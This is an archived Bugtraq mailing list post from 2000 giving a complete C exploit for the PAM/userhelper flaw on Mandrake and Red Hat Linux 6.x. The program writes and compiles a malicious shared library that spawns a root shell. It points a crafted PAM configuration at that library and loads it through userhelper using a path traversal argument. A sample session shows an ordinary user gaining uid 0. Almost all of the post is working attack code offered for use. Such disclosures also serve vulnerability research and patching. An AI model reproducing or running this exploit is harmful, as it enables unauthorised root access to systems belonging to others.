Bugtraq mailing list archives
Exploit for Mandrake 6.1 (PAM/userhelper bug)
From: prrar () NITNET COM BR (Paulo Ribeiro)
Date: Wed, 15 Mar 2000 00:14:05 +0000
/*
 * pam-mdk.c (C) 2000 Paulo Ribeiro
 *
 * DESCRIPTION:
 * -----------
 * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
 * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
 * I created this C program based on it which exploits PAM/userhelper
 * and gives you UID 0.
 *
 * SYSTEMS TESTED:
 * --------------
 * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
 *
 * RESULTS:
 * -------
 * [prrar@linux prrar]$ id
 * uid=501(prrar) gid=501(prrar) groups=501(prrar)
 * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
 * [prrar@linux prrar]$ ./pam-mdk
 * sh-2.03# id
 * uid=0(root) gid=501(prrar) groups=501(prrar)
 * sh-2.03#
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        FILE *fp;

        strcpy(argv[0], "vi test.txt");

        fp = fopen("abc.c", "a");
        fprintf(fp, "#include<stdlib.h>\n");
        fprintf(fp, "#include<unistd.h>\n");
        fprintf(fp, "#include<sys/types.h>\n");
        fprintf(fp, "void _init(void) {\n");
        fprintf(fp, "\tsetuid(geteuid());\n");
        fprintf(fp, "\tsystem(\"/bin/sh\");\n");
        fprintf(fp, "}");
        fclose(fp);

        system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");
        system("chmod 755 abc.conf");
        system("gcc -fPIC -o abc.o -c abc.c");
        system("ld -shared -o abc.so abc.o");
        system("chmod 755 abc.so");
        system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");
        system("rm -rf abc.*");
}

/* pam-mdk.c: EOF */

___________________________________
Paulo Ribeiro
prrar () nitnet com br